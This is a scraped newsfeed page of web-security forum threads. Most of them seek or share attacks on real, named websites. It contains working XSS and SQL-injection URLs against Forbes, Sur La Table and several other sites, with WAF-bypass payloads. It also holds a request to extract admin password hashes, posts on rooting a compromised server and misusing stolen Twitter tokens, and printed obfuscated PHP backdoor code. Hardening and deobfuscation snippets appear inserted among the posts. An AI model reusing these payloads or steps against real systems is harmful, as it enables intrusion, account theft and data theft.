sla.ckers.org @ the web & the world :: hundreds of fresh newsfeeds on schuirink.net

news headlines

News headlines collected from 498 newsfeeds.

sla.ckers.org | The Web Application Security Forums

url: http://sla.ckers.org

formmail.pl javascript alert tag plus html alert tag within javascript tag (1 reply)


Hello guys, I just found out on my own how to include HTML within JavaScript... A working link with vulnerable formmail is here:

http://apo rre alo s.com/cgi-sys/formmail.pl?recipient=martin@aporrealos.com&subject=1&redirect=javascript:alert%28123%29;alert%28document.write.value=%3Ch1%3EHello%20%3C/h1%3E%29;

notice URL encoding...

the original formmail javascript injection was

http://apo rr ealo s.com/cgi-sys/formmail.pl?recipient=martin@aporrealos.com&subject=1&redirect=javascript:alert(123);alert(document.write.value=<h1>Hello</h1>);

I used this in Firefox version 7. When I copied it here, the message board system automatically encoded the tags and parentheses.

After I injected the code I got a 302 error that looked like this:

Found

The document has moved here.
Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.6 Phusion_Passenger/3.0.9 mod_bwlimited/1.4 Server at aporrealos.com Port 80

A 123 alert box popped up and later a Hello alert box popped up.

Hello, (no replies)


Hi,

I am new in this forum.

Here for sharing knowledge on different topics.

Thanks & Regards,
Cole
http://www.esparkinfo.com/

TinKode Arrested in Romania (5 replies)


TinKode Arrested in Romania for hacking into NASA and the Pentagon
http://www.pcmag.com/article2/0,2817,2399698,00.asp

[Oracle] It's Injectable? (2 replies)


Hello everyone, this is my first post, so I'll introduce myself.
My name is Stephen and I'm Italian. I like computer science and programming, especially in PHP, Perl, AJAX, JScript, jQuery.
I like doing "hacking" for passion and curiosity.

Now for the problem:

www.target.com/xxx?lol=asd&id_page=3536 '

The error that is printed is:

ORA-06512 PL / SQL: Error: Error converting from character to number of number or value
ORA-06512: at line 2

I have never seen this type of error, I know that the DBMS is Oracle, but I do not know how to move forward.
If you can help me I would be very grateful.
If you have any paper or video tutorial about this, that would not be bad.

Thanks in advance.

XSS - URL In Source Of Page (3 replies)


Hi,

Need assistance in validating a vulnerability. When executing a specific URL:
https://x.x.x.x/b/l.e?null=http://hXvpfwkV.example.com/

The page is returned and I can find "http://hXvpfwkV.example.com/" in the source of the page...here is the source:

<INPUT id="rt" name="rt" type="hidden" value="null=http://hXvpfwkV.example.com/">

I am trying to understand how this could be a vulnerability and how would one exploit it? What are the limitations?

Any assistance would be appreciated.

Regards
A

Can't bypass union (1 reply)


http://www.vlada.hr/design/vlada2/dtv/index.php?q=zagreb'+and+1=1+/*!uNioN*/+select+all+1,2,3,4,5,6,7+--+

can't bypass it -.-'
any ideas?

Hex Edit+GIMP to find Debug Mode in UPLOAD AVATAR php (1 reply)


HELLO GUYS, I WAS EXPERIMENTING AND TAMPERING AROUND WITH A PICTURE AND DOING IMAGE INJECTION. I TOOK A HALO PICTURE I SHOT, THEN I USED HXD HEX EDITOR AND EMBEDDED PHPINFO CODE INSIDE THE PIC, AFTER THE JPEG HEADER, AND SAVED IT AS .PHP.JPEG. THEN I USED GIMP AND CONVERTED THE PICTURE TO BLACK AND WHITE; I saved the file as .php.jpeg in GIMP. FUNNY THING IS GIMP OPENS THE FILE AFTER I INSERTED THE PHP CODE in black and white mode. What did I do after this??

Well, I decided to go to a forum: foro, re vo lu cion al dia.org, checked myself in and uploaded the picture. The site had no problems uploading the picture; to my surprise I got an error:


HERE ARE THE PICS, HALO, INJECTED IMAGE WITH HXD EDITOR AND THE ERROR ON FORUM:

RESULTS AFTER UPLOADING PICTURE IN THE FORUM, THIS IS AFTER UPLOAD:



Search.php; memberlist.php; login.php DOS and Gateway Time Out Errors (no replies)


Hi guys, I was reading about the Gateway time out errors and how they are produced. Is it possible to make a request to these PHP functions and overload a specific website so it would crash and/or freeze?

I was thinking about the following:
1.- Making a very big request in those webpages; the logical consequence will be that the server could not fulfill the request and come to a halt
2.- Use ping command to the specific URL and crash website
3.- Use a script to do it.

Is this possible???

I can't get my website to work (1 reply)


There was a website that somebody created and they gave me the source code package so that I could create my own version of the website based on their package.

These were the instructions that I had to follow (and I followed them all except one, which is why my website won't work and I am confused at the instruction):

--------------------------------------------------------------
== Server Requirements ==
- Apache (with mod_rewrite and preferably mod_expires)
- PHP 5
- MySQL
- SimpleXML
- cURL

== SQL ==
1. Using phpMyAdmin, create a new database and import the "tables.common.sql" file.
2. Open the "tables.site.sql" file using Notepad or another similar text editor, replace "PREFIX_" with a unique prefix specific to that site and import that file into the database.
3. Now decide whether or not to make your site "Here's an idea" or taskforce styled.
   - Here's an idea
     - Uses the comment labeling system

   - Taskforce
     - Uses submission voting

4. Once you're decided, open the appropriate SQL file and replace "PREFIX_" with the unique prefix that you come up with and import that file into the database.

Don't close that phpMyAdmin window yet, you need it at the end.

== Text editing ==
5. Rename "conf.dist.php" to "conf.php"
6. Open "conf.php" in your text editor. (Note that some settings are overridden by the site-specific file)
   - Database settings
     - Change those to match your database settings

   - General configuration
     - Change the URL and site name
     - IMPORTANT: If you decide to make the site Here's an idea-styled, change 'shortname' to 'hai'. If you're doing taskforce-styled, change 'shortname' to 'taskforce'
     - 'subsite' does nothing much except gives you a new class name for you to use in stylesheets
     - Change 'reply_to' to your own e-mail address so that when users click on Reply in their e-mail client, it will reply directly to you
     - Change 'send_mail' to true if you want subscriptions (note that this feature uses a SMTP server and is currently hard-coded, open system.php and do a search for "Swift_SmtpTransport")
     - Get a RPX key at https://rpxnow.com/ and fill in the API key

7. Open .htaccess in your text editor and around line 20 and 24, change it to an appropriate folder.

Don't give up, the remaining is going to be easy(ish).

== Misc ==
8. Upload all the files to your website
9. Open the website in your browser. If it loads, then congrats! If it doesn't, then make sure conf.php is edited properly and so on
10. Open the login dialog
11. Login to your account and register
12. After registering, go to the "common_users" table in phpMyAdmin
13. Edit the (only) row/user and change 'group' to 1
14. Save it and you have become the admin of your site

That's it!
-------------------------------------------------------------------------

Where it says "7. Open .htaccess in your text editor and around line 20 and 24, change it to an appropriate folder." I am confused about exactly what I put in those lines in the .htaccess file. Because of this, I keep getting an HTTP 505 Internal Server error instead of my website working.

This is the contents of the .htaccess file:

<IfModule mod_expires.c>
ExpiresActive On
ExpiresByType text/css "access plus 7 days"
ExpiresByType text/javascript "access plus 7 days"
ExpiresByType text/x-javascript "access plus 7 days"
ExpiresByType application/javascript "access plus 7 days"
ExpiresByType application/x-javascript "access plus 7 days"
ExpiresByType image/gif "access plus 7 days"
ExpiresByType image/jpg "access plus 7 days"
ExpiresByType image/png "access plus 7 days"
</IfModule>

<IfModule mod_deflate.c>
AddOutputFilterByType DEFLATE text/html text/plain text/xml text/css
</IfModule>

<IfModule mod_rewrite.c>
Options -MultiViews
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
# RewriteCond %{REQUEST_URI} !\..+$
RewriteRule . /index.php [L]
</IfModule>

ServerSignature Off

What exactly do I need to type in line 20 and 24 to change it to an appropriate folder? If needs be, I will provide a link to the zip file containing the source code package for the website.

XSS Challenge by Abraham Aranguren (no replies)


Fellow Slackers,

Abraham just asked me kindly to post this link here - so I did it :)

[blog.7-a.org]

Have fun,
.mario

P.S. Python2.7-dev is needed to compile this lib properly.. just FYI

Help With SQL injection i found debug mode (1 reply)


Hello guys, sorry if I've been replying in other posts, I didn't see the create new topic until today, it's usually below in forums...

Well, I found the following vulnerabilities in this site:

www. aporr ealos.com/forum

links:

1-- http://aporrealos.com/forum/memberlist.php?mode[]=


Errors shown:
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/aporrea/public_html/forum/memberlist.php on line 40

Warning: Cannot modify header information - headers already sent by (output started at /home/aporrea/public_html/forum/memberlist.php:40) in /home/aporrea/public_html/forum/includes/page_header.php on line 479

Warning: Cannot modify header information - headers already sent by (output started at /home/aporrea/public_html/forum/memberlist.php:40) in /home/aporrea/public_html/forum/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output started at /home/aporrea/public_html/forum/memberlist.php:40) in /home/aporrea/public_html/forum/includes/page_header.php on line 486

2.- http://aporrealos.com/forum/memberlist.php?start=-1

error:

Could not query users

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 60' at line 4

SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 60

Line : 151
File : memberlist.php

3.- http://aporrealos.com/forum/viewtopic.php?t=50837&postdays=0&postorder=desc%20limit&start=-16

error shown:

Could not query users

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 60' at line 4

SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 60

Line : 151
File : memberlist.php

Can you guys help me getting the password hashes from Admin4,Admin5 and rest of users please?

I need help with bypassing a nasty filter. (4 replies)


So here is what i'm dealing with;
<input type="hidden" name="object1" id="object1" value="XSSTEST">
So, of course I need to close the input, by adding ">.

<input type="hidden" name="object1" id="object1" value=""><script>prompt(1)</script>"
But my issue is, the filter filters out the (")'s and <>'s.
The output is;
<input type="hidden" name="object1" id="object1" value="">TESTXSS">
I've tried HTML

Can anyone give me some insight?

Edit: I've already tried encoding it with the following; URL,Hex,Unicode,Named,Decimal,Hex,and XML escaped.

upload php files (1 reply)


...... ,,,

sslstrip why it works for me and not for gmail and rest? (3 replies)


I need help understanding the dynamics of the sslstrip attack against SSL certs. I'm using it to test the security of a site which is in my ownership. I can successfully sniff the victim credentials over the internet, but when the same attack happens in the case of Gmail or Live MSN I get no stuff back; it's completely static in that case.

Does it mean their SSL is secure and mine is not? Like the rogue SSL cert generated by sslstrip is caught and blocked by their SSL cert security and mine is like configured in an insecure mode?

What do I need to do to prevent such attacks on my site? Thanks

alo.rs (no replies)


hi guys. i could use a bit of help with this.
does anyone have any ideas on how to bypass this php custom filter?
http://www.alo.rs/resources/templates/tools/print.php?id=45356

Help decoding a PHP file (3 replies)


Hi There,
Recently, my site was hacked. After running webdefender it suggests this file is a possible culprit. I'd like to decode it but haven't the faintest idea how. Do any of you out there think you can help me with this?

Thank you!
Phoebe



<?php
preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28'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'\x29\x29\x20\x29\x20\x3b",".");?>
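
The hex escapes in the file above spell out eval ( gzinflate ( base64_decode ( ... ) ) ), and preg_replace()'s /e modifier (removed in PHP 7) evaluates that replacement string as PHP code. The following is an added example, not code from the post or from webdefender, that peels such layers statically without executing anything; the function names are hypothetical and the sample blob is constructed, because the real payload is not on the page:

```php
<?php
// Added example, not code from the post. It decodes only and never calls eval().
declare(strict_types=1);

/** Turn PHP double-quoted "\xNN" escapes into the bytes they stand for. */
function decode_hex_escapes(string $s): string
{
    return preg_replace_callback(
        '/\\\\x([0-9a-fA-F]{2})/',
        fn(array $m): string => chr((int) hexdec($m[1])),
        $s
    );
}

/** Peel eval(gzinflate(base64_decode('...'))) layers and return each one. */
function unwrap_layers(string $code, int $maxDepth = 10): array
{
    $pattern = '/eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+\/=]+)[\'"]/';
    $layers = [];
    for ($i = 0; $i < $maxDepth; $i++) {
        $code = decode_hex_escapes($code);
        if (!preg_match($pattern, $code, $m)) {
            break; // no further wrapper of this shape
        }
        $raw = base64_decode($m[1], true);
        $plain = ($raw === false) ? false : @gzinflate($raw);
        if ($plain === false) {
            break; // blob is damaged or uses a different encoding
        }
        $layers[] = $plain;
        $code = $plain;
    }
    return $layers;
}

// Constructed sample: the wrapper text from the post with a harmless blob
// substituted for the payload, which the page does not contain.
$blob = base64_encode(gzdeflate('echo "constructed sample payload";'));
$sample = '<?php preg_replace("/.*/e","'
    . '\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20'
    . '\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28\''
    . $blob
    . '\'\x29\x29\x20\x29\x20\x3b",".");?>';

// Show the decoded wrapper with the blob shortened, then every recovered layer.
echo decode_hex_escapes(str_replace($blob, '<blob>', $sample)), "\n";
foreach (unwrap_layers($sample) as $n => $layer) {
    printf("layer %d: %s\n", $n + 1, $layer);
}
```

Run it against a copy of the suspect file on an isolated machine and read the last layer as text; droppers of this kind are often nested several levels deep, which is why the loop repeats.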

LFI Help (no replies)


I just tested something local. I use the following code
<?php
$action = $_GET['do'].'.php';
include($action);

And i want to include the file a.html

Normally you would do it like that:
?do=a.html%00

But that doesn't work, I only get this error
Warning: include() [function.include]: Failed opening 'a.html' for inclusion in on line 3

Any ideas?

[MED]CHALLENGE (15 replies)


A few days ago I received this site from a friend.
I solved the challenge pretty quickly.
Now here's the question, will u?

site:
http://www.itpark.am/firm.php?lang=us&id=9

rules:
-solve it with union select or error based(error might be even harder..)
-Pm solution or Post a picture.

Proof:
-union:

-error: (sorry it's a bit small..photobucket)


Solvers:
-Lolalu0

Have fun and good luck. (u will need it)

Tnx to Net_Spy for sending me this site

so,can you guys help to root it? (4 replies)


Hello guys, there is a server and I've already got the webshell. The OS is Linux and the kernel version is 2.6.18-92, and I have tried all the exploits on the internet but can't get root of it. Any ideas?

Hi friends (1 reply)


Hi Friends, I am BreakTheSec, Security Researcher and News reporter.

Help to pass my login form (2 replies)


Hi,

I would like to pass this login form with an sql injection.

The SQL Script is:

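<?php
// Runs when the login form (submit field 'inloggen') is posted.
if (isset($_POST['inloggen'])) {
    // The posted username is concatenated straight into the SQL string.
    $sql = "SELECT * FROM gebruikers_sitebeheerder WHERE gebruikers_naam='" . $_POST['gebruikersnaam'] . "'";
    // mysql_error() takes an optional link identifier, not the query text.
    $result = mysql_query($sql) or die(mysql_error());

    while ($rij = mysql_fetch_array($result)) {
        if ($rij['gebruikers_naam'] != $_POST['gebruikersnaam']) {
            // username mismatch: no login
        } elseif ($rij['gebruikers_wachtwoord'] != $_POST['wachtwoord']) {
            // password mismatch: no login
        } else {
            $_SESSION['gebruikers_id'] = $rij['gebruikers_id'];
            $_SESSION['naam'] = $rij['gebruikers_naam'];
            echo '<script>this.location.href="./loggedin.php";</script>';
        }
    }
}
?>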

The script is Dutch but here is a quick translation:
gebruikers_sitebeheerder = admin_users
gebruikers_naam = username
gebruikers_wachtwoord = password
gebruikers_id = username_id
naam = name

Please help me to improve this security.

Thanks :)
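
One way to harden the login check posted above, as an added example that is not part of the original post: the username is bound as a query parameter and the password is compared against a stored hash. It assumes PDO is available, uses an in-memory SQLite table (constructed here) in place of the poster's MySQL table, and `demo_db()` and `check_login()` are hypothetical names.

```php
<?php
// Added example, not the poster's code. Assumptions: PDO with the SQLite driver,
// an in-memory table standing in for the MySQL table named in the post, and
// passwords stored as password_hash() output instead of plain text.
declare(strict_types=1);

function demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE gebruikers_sitebeheerder (
        gebruikers_id INTEGER PRIMARY KEY,
        gebruikers_naam TEXT UNIQUE NOT NULL,
        gebruikers_wachtwoord TEXT NOT NULL)');
    // Constructed sample account.
    $ins = $pdo->prepare('INSERT INTO gebruikers_sitebeheerder
        (gebruikers_naam, gebruikers_wachtwoord) VALUES (?, ?)');
    $ins->execute(['beheerder', password_hash('correct horse', PASSWORD_DEFAULT)]);
    return $pdo;
}

/** Returns the user row on success, null on any failure (hypothetical helper). */
function check_login(PDO $pdo, $naam, $wachtwoord): ?array
{
    // Reject non-string input such as gebruikersnaam[]=x before it reaches the query.
    if (!is_string($naam) || !is_string($wachtwoord)) {
        return null;
    }
    // The username travels as a bound parameter, never as SQL text.
    $stmt = $pdo->prepare('SELECT gebruikers_id, gebruikers_naam, gebruikers_wachtwoord
        FROM gebruikers_sitebeheerder WHERE gebruikers_naam = ?');
    $stmt->execute([$naam]);
    $rij = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($rij === false || !password_verify($wachtwoord, $rij['gebruikers_wachtwoord'])) {
        return null; // same answer for unknown user and wrong password
    }
    unset($rij['gebruikers_wachtwoord']); // never hand the hash to the caller
    return $rij;
}

$pdo = demo_db();
$attempts = [                          // constructed inputs
    ['beheerder', 'correct horse'],    // valid login
    ['beheerder', 'wrong'],            // wrong password
    ["d'Artagnan", 'x'],               // a quote in the name is only data now
    [['beheerder'], 'x'],              // array instead of string
];
foreach ($attempts as [$naam, $wachtwoord]) {
    $rij = check_login($pdo, $naam, $wachtwoord);
    printf("%-16s => %s\n", json_encode($naam), $rij ? 'accepted' : 'rejected');
}
// In the real page, on success: session_regenerate_id(true), store gebruikers_id
// in $_SESSION and redirect with header('Location: ./loggedin.php'); log database
// errors on the server rather than printing them with die().
```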

help with md5 (no replies)


done..

Twitter oauth tokens now what? (2 replies)


So I found a site that was storing 10 twitter usernames, consumer_key, consumer_secret, oauth_token and oauth_token_secret

So I have all this information.... now what?
Can I use it to get on their twitter accounts?

Hacking Sur La Table's Kiosk (1 reply)


So I was perusing around our local Sur La Table and came across this

http://i.imgur.com/LeGpD.jpg

(to the left is a Cisco VoIP phone that it was plugged in to)

Needless to say it caught my attention.

I tried the 3 finger salute, I tried the Windows button, and the windows + D button and I wasn't getting anywhere.

So I started to poke around the menus and all that I had access to was the website.
No URL bar, no right click to open in new window or save as.

So I was wondering how I could get to another website to potentially download a command prompt or something, when I only have access to their website?

Well their website is vulnerable to XSS which allowed me to do a document.location

http://www.surlatable.com/search/searchContainer.jsp?q="><script>document.location='http://google.com';</script>&s=true

as you can see by: http://i.imgur.com/dMGpS.jpg

Another potential option would have been, via their home page, their ads to their Twitter and Facebook pages.

So obviously they didn't have a whitelist/blacklist of URLs to visit.

I was not able to exploit any further, as my significant other was catching on to what I was doing.

But with it being tied into the Cisco phones, I would place a bet that it is tied into the same system as the cash registers. (just speculating here)

So happy hacking!

forbes [XSS] (no replies)


http://search.forbes.com/search/colArchiveSearch?author="><script>alert(document.cookie)</script>

Hello (1 reply)


Hello guys i am longrifle0x, security researcher

Please Help Decoding php script (1 reply)


I've tried to decode this php script, but I don't have much luck.
Can someone please try to decode this?
Thanks in advance!

<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0xe60;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NGM5KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>T_TdY~uOrbtLOSPmHkr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLT09NHeEXHr8XhtONT08XHeEXHr8Pkr8XTzEXT08XHtILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXTzEpKX==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SO

Bypassed Waf . think like double query will work, .cant bypass that. (1 reply)


PHP Code 1:
http://gpl4you.com/myinternship.php?id=1314&page=0
How i bypassed
PHP Code 2:
http://gpl4you.com/myinternship.php?id=1314&page=0+/*!UnIoN*//*%0A*//*!SeLeCt*//*%0A*/+1--+

Now what to do?
Something like
PHP Code3:
http://gpl4you.com/myinternship.php?id=1314&page=0%20and%20%28/*%0A*//*!SeLeCt*//*%0A*/%20*%20from%20%28/*%0A*//*!SeLeCt*//*%0A*/%20/*%0A*/%20name_const%28version%28%29,1%29/*%0A*/%20,/*%0A*/%20name_const%28version%28%29/*%0A*/%20,1%29%29a%29

Simply help me bypass the WAF in double query, or if something else can be done.
Thnx guys.

VaIbS

Are there any XSS vulnerabilities in SMF 2.0.2? (2 replies)


hi, i'm a noob at this stuff, but my friend hosts a forum (which uses SMF 2.0.2), and as far as i know, anywhere there's a place for user input (be it posting a thread, the title of a thread, the search bar, editing your profile info, etc.), it will convert

" to &quot;
< to &lt;
> to &gt;
' to &#039;

and as such, there seems to be no way to get out of attributes or do anything. also, there's no way to post a link or link to an external site picture (say, for your avatar) w/o it automatically appending an "http://" prefix.

can anyone think of a way to get past all this filtering?

voip Application-Level Interception need some advice/help (1 reply)


I need help. I work as a sec analyst for a notable company in my country. I'm currently assessing a VoIP setup. I'm using Application-Level Interception techniques to test the setup's weaknesses. The tool I'm using to conduct the interception-level attack is sip_rogue, which is included in bt4. The attack allows you as the attacker to listen to the conversation occurring between SIP phones. The commands are:

sip_rogue
telnet localhost 6060
Connection 0
create sipudpport port
create sipdispatcher disp
create sipregistrarconnector reg to 10.1.101.2:5060 with the domain 10.1.101.2
create rtphandler rtp
create sipendpoint hacker
issue hacker accept calls
issue hacker relay calls to sip:3500@10.1.100.35
issue hacker tap calls to sip:4000@10.1.100.40 (the attacker)

In the original attack mentioned in Hacking Exposed VoIP: Voice over IP Security Secrets and Solutions, the victim and the attacker are on the same VLAN as the proxy server, but in my case it's a different VLAN. As I pick up the phone (ext 4000) to listen in on the conversation I just get the dial tone. I'm using ettercap to direct the traffic from the victim IP phone to the bt4 machine running the sip_rogue application.

I hope I can be helped with this. Thanks